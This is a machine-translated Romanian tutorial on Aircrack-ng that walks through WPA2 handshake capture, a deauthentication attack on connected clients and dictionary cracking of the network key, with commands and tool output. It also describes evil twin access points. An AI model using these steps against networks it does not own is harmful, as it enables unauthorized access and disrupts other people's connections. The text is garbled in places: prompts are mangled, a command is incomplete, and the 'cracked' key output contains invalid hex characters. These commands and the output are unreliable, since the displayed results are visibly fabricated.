crăpătură aeriană

Cum se folosește Aircrack-ng

Cum se folosește Aircrack-ng
De cele mai multe ori, oamenii nu se gândesc niciodată la rețeaua la care sunt conectați. Nu se gândesc niciodată cât de sigură este rețeaua respectivă și cât de mult își riscă zilnic datele confidențiale. Puteți rula verificări de vulnerabilitate pe rețelele dvs. wifi utilizând un instrument foarte puternic numit Aircrack-ng și Wireshark. Wireshark este utilizat pentru a monitoriza activitatea rețelei. Aircrack-ng seamănă mai mult cu un instrument agresiv care vă permite să hack și să oferiți acces la conexiunile wireless. Gândirea ca un intrus a fost întotdeauna cel mai sigur mod de a te proteja împotriva unui hack. S-ar putea să puteți înțelege acțiunile exacte pe care le va întreprinde un intrus pentru a obține acces la sistemul dvs., aflând despre aircrack. Apoi puteți efectua verificări de conformitate pe propriul dvs. sistem pentru a vă asigura că nu este nesigur.

Aircrack-ng este un set complet de software conceput pentru a testa securitatea rețelei WiFi. Nu este doar un singur instrument, ci o colecție de instrumente, fiecare dintre care îndeplinește un scop anume. Se pot lucra la diferite domenii de securitate wifi, cum ar fi monitorizarea punctului de acces, testarea, atacarea rețelei, spargerea rețelei wifi și testarea acestuia. Obiectivul cheie al Aircrack este interceptarea pachetelor și descifrarea hashurilor pentru a sparge parolele. Suportă aproape toate noile interfețe wireless. Aircrack-ng este o versiune îmbunătățită a unei suite de instrumente învechite Aircrack, ng se referă la Nouă generație. Unele dintre instrumentele minunate care funcționează împreună în realizarea unei sarcini mai mari.

Airmon-ng:

Airmon-ng este inclus în kitul aircrack-ng care plasează placa de interfață de rețea în modul monitor. Cardurile de rețea acceptă, de obicei, numai pachetele vizate pentru acestea, așa cum sunt definite de adresa MAC a NIC, dar cu airmon-ng, toate pachetele wireless, indiferent dacă sunt sau nu vizate, vor fi acceptate și ele. Ar trebui să puteți prinde aceste pachete fără a vă conecta sau autentifica cu punctul de acces. Este folosit pentru a verifica starea unui punct de acces prin punerea interfeței de rețea în modul monitor. În primul rând, trebuie să configurați cardurile wireless pentru a activa modul monitor, apoi să ucideți toate procesele de fundal dacă credeți că orice proces interferează cu acesta. După terminarea proceselor, modul monitor poate fi activat pe interfața fără fir executând comanda de mai jos:

[email protected]: ~ $ sudo airmon-ng start wlan0 #

De asemenea, puteți dezactiva modul monitor oprind ormonul oricând utilizând comanda de mai jos:

[e-mail protejat]: ~ $ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng este utilizat pentru a lista toate rețelele care ne înconjoară și pentru a vizualiza informații valoroase despre acestea. Funcționalitatea de bază a airodump-ng este să adulmece pachete, deci este în esență programată pentru a apuca toate pachetele din jurul nostru în timp ce este pus în modul monitor. Îl vom executa împotriva tuturor conexiunilor din jurul nostru și vom aduna date precum numărul de clienți conectați la rețea, adresele lor Mac corespunzătoare, stilul de criptare și numele canalelor și apoi vom începe să vizăm rețeaua noastră țintă.

Tastând comanda airodump-ng și oferindu-i numele interfeței de rețea ca parametru, putem activa acest instrument. Va enumera toate punctele de acces, cantitatea de pachete de date, metodele de criptare și autentificare utilizate și numele rețelei (ESSID). Din punct de vedere al hacking-ului, adresele Mac sunt cele mai importante câmpuri.

[e-mail protejat]: ~ $ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack este utilizat pentru cracarea parolei. După capturarea tuturor pachetelor folosind airodump, putem sparge cheia prin aircrack. Crăpă aceste taste folosind două metode PTW și FMS. Abordarea PTW se face în două faze. La început, sunt folosite doar pachetele ARP și abia apoi, dacă cheia nu este crăpată după căutare, folosește toate celelalte pachete capturate. Un punct pozitiv al abordării PTW este că nu toate pachetele sunt utilizate pentru cracare. În a doua abordare, i.e., FMS, folosim atât modelele statistice, cât și algele de forță brută pentru a sparge cheia. Poate fi utilizată și o metodă de dicționar.

Aireplay-ng:

Airplay-ng introduce pachete într-o rețea fără fir pentru a crea sau a accelera traficul. Pachetele din două surse diferite pot fi capturate de aireplay-ng. Primul este rețeaua live, iar al doilea este pachetele din fișierul pcap deja existent. Airplay-ng este util în timpul unui atac de deauthentificare care vizează un punct de acces wireless și un utilizator. Mai mult, puteți efectua unele atacuri, cum ar fi atacul cu cafea latte, cu airplay-ng, un instrument care vă permite să obțineți o cheie din sistemul clientului.  Puteți realiza acest lucru prin prinderea unui pachet ARP și apoi manipularea acestuia și trimiterea acestuia înapoi la sistem. Clientul va crea apoi un pachet care poate fi capturat de aerodump și aircrack fisurează cheia din acel pachet modificat. Unele alte opțiuni de atac ale airplay-ng includ chopchop, fragment arepreplay, etc.

Airbase-ng:

Airbase-ng este folosit pentru a transforma computerul unui intrus într-un punct de conexiune compromis pentru ca alții să se conecteze. Folosind Airbase-ng, puteți pretinde că sunteți un punct de acces legal și puteți efectua atacuri de tip man-in-the-middle asupra computerelor care sunt atașate la rețeaua dvs. Aceste tipuri de atacuri se numesc Evil Twin Attacks. Este imposibil ca utilizatorii de bază să discearnă între un punct de acces legal și un punct de acces fals. Deci, amenințarea malefică a gemenilor este una dintre cele mai amenințătoare amenințări wireless cu care ne confruntăm astăzi.

Airolib-ng:

Airolib accelerează procesul de hacking stocând și gestionând listele de parole și punctul de acces. Sistemul de gestionare a bazelor de date utilizat de acest program este SQLite3, care este disponibil în cea mai mare parte pe toate platformele. Cracarea parolei include calculul cheii master pereche prin care se extrage cheia privată tranzitorie (PTK). Folosind PTK, puteți determina codul de identificare a mesajului cadru (MIC) pentru un anumit pachet și, teoretic, puteți găsi MIC similar cu pachetul, deci dacă PTK avea dreptate, PMK avea dreptate.

Pentru a vedea listele de parole și pentru a accesa rețelele stocate în baza de date, tastați următoarea comandă:

[e-mail protejat]: ~ $ sudo airolib-ng testdatabase -stats

Aici testdatabase este baza de date la care doriți să accesați sau să creați, iar -stats este operația pe care doriți să o efectuați pe ea. Puteți efectua mai multe operații pe câmpurile bazei de date, cum ar fi acordarea priorității maxime unor SSID sau ceva similar. Pentru a utiliza airolib-ng cu aircrack-ng, introduceți următoarea comandă:

[e-mail protejat]: ~ $ sudo aircrack-ng -r testdatabase wpa2.eapol.capac

Aici folosim PMK-urile deja calculate stocate în baza de date de testare pentru accelerarea procesului de cracare a parolei.

Cracking WPA / WPA2 folosind Aircrack-ng:

Să vedem un mic exemplu de ceea ce poate face aircrack-ng cu ajutorul câtorva dintre instrumentele sale minunate.  Vom sparge cheia pre-partajată a unei rețele WPA / WPA2 folosind o metodă de dicționar.

Primul lucru pe care trebuie să-l facem este să listăm interfețele de rețea care acceptă modul de monitorizare. Acest lucru se poate face folosind următoarea comandă:

[e-mail protejat]: ~ $ sudo airmon-ng
Chipset pentru driverul de interfață PHY
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Putem vedea o interfață; acum, trebuie să punem interfața de rețea pe care am găsit-o (wlx0) în modul monitor folosind următoarea comandă:

[e-mail protejat]: ~ $ sudo airmon-ng start wlx0

A activat modul monitor pe interfața numită wlx0mon.

Acum ar trebui să începem să ascultăm transmisiunile de către routerele din apropiere prin interfața noastră de rețea pe care am pus-o în modul monitor.

[e-mail protejat]: ~ $ sudo airodump-ng wlx0mon
CH 5] [Scurs: 30 s] [2020-12-02 00:17
 
BSSID PWR Beacons #Data, # / s CH MB ENC CIPHER AUTH ESSID
 
E4: 6F: 13: 04: CE: 31 -45 62 27 0 1 54e WPA2 CCMP PSK CrackIt
C4: E9: 84: 76: 10: BE -63 77 0 0 6 54e. WPA2 CCMP PSK HAckme
C8: 3A: 35: A0: 4E: 01 -63 84 0 0 8 54e WPA2 CCMP PSK Net07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54e WPA2 CCMP PSK TP-Link_3802
 
BSSID STATION PWR Rate Frobe Lost Probe
 
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1e 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1e- 6e 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -39 0e- 1 1002 13 

Rețeaua noastră țintă este Sparge-l în acest caz, care rulează în prezent pe canalul 1.

Aici, pentru a sparge parola rețelei țintă, trebuie să capturăm o strângere de mână în 4 direcții, care se întâmplă atunci când un dispozitiv încearcă să se conecteze la o rețea. O putem captura folosind următoarea comandă:

[protejat prin e-mail]: ~ $ sudo airodump-ng -c 1 --bssid E4: 6F: 13: 04: CE: 31 -w / home wlx0

-c         : Canal

-bssid: Bssid al rețelei țintă

-w        : Numele directorului în care va fi plasat fișierul pcap

Acum trebuie să așteptăm ca un dispozitiv să se conecteze la rețea, dar există o modalitate mai bună de a captura o strângere de mână. Putem anula autentificarea dispozitivelor către AP folosind un atac de auteautentificare utilizând următoarea comandă:

[protejat prin e-mail]: ~ $ sudo aireplay-ng -0 -a E4: 6F: 13: 04: CE: 31

A: Bssid al rețelei țintă

-0: Atac de deauthentificare

Am deconectat toate dispozitivele și acum trebuie să așteptăm ca un dispozitiv să se conecteze la rețea.

CH 1] [Scurs: 30 s] [2020-12-02 00:02] [Strângere de mână WPA: E4: 6F: 13: 04: CE: 31
 
BSSID PWR RXQ Beacons #Data, # / s CH MB ENC CIPHER AUTH E
 
E4: 6F: 13: 04: CE: 31 -47 1 228 807 36 1 54e WPA2 CCMP PSK P
 
BSSID STATION PWR Rate Frobe Lost Probe
 
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0e- 1e 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7E -31 0e- 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0e- 6e 263 708 CrackIt
E4: 6F: 13: 04: CE: 31 D4: 6A: 6A: 99: ED: E3 -35 0e- 0e 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1e 0 1            

Am primit o lovitură și, uitându-ne la colțul din dreapta sus chiar lângă timp, putem vedea o strângere de mână a fost capturată. Acum căutați în folderul specificat ( /Acasă în cazul nostru) pentru un „.pcap”Fișier.

Pentru a sparge cheia WPA, putem folosi următoarea comandă:

[e-mail protejat]: ~ $ sudo aircrack-ng -a2 -w rockyou.txt -b E4: 6F: 13: 04: CE: 31 strângere de mână.capac
b: Bssid al rețelei țintă
-a2: modul WPA2
Rockyou.txt: Fișierul de dicționar utilizat
Strângere de mână.cap: fișierul care conține strângere de mână capturată
Aircrack-ng 1.2 beta3
[00:01:49] 10566 taste testate (1017.96 k / s)
CHEIE GĂSITĂ! [ m-ai prins ]
Cheie principală: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Cheie tranzitorie: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

Cheia rețelei noastre țintă a fost spartă cu succes.

Concluzie:

Rețelele wireless sunt pretutindeni, utilizate de fiecare companie, de la lucrătorii care folosesc smartphone-uri la dispozitive de control industrial. Potrivit cercetărilor, aproape peste 50% din traficul de internet va fi prin WiFi în 2021.  Rețelele fără fir au multe avantaje, comunicarea în afara ușilor, accesul rapid la internet în locuri în care este aproape imposibil să puneți fire, poate extinde rețeaua fără a instala cabluri pentru orice alt utilizator și vă poate conecta cu ușurință dispozitivele mobile la birourile de acasă în timp ce nu e acolo.

În ciuda acestor avantaje, există un mare semn de întrebare cu privire la confidențialitatea și securitatea dvs. Ca aceste rețele; în raza de transmisie a routerelor sunt deschise tuturor, pot fi ușor atacate, iar datele dvs. pot fi ușor compromise. De exemplu, dacă sunteți conectat la o rețea Wi-Fi publică, oricine este conectat la rețeaua respectivă vă poate verifica cu ușurință traficul de rețea utilizând o anumită informație și cu ajutorul unor instrumente minunate disponibile și chiar le poate arunca.

How to Change Mouse and Touchpad Settings Using Xinput in Linux
Most Linux distributions ship with “libinput” library by default to handle input events on a system. It can process input events on both Wayland and X...
Remap your mouse buttons differently for different software with X-Mouse Button Control
Maybe you need a tool that could make your mouse's control change with every application that you use. If this is the case, you can try out an applica...
Microsoft Sculpt Touch Wireless Mouse Review
I recently read about the Microsoft Sculpt Touch wireless mouse and decided to buy it. After using it for a while, I decided to share my experience wi...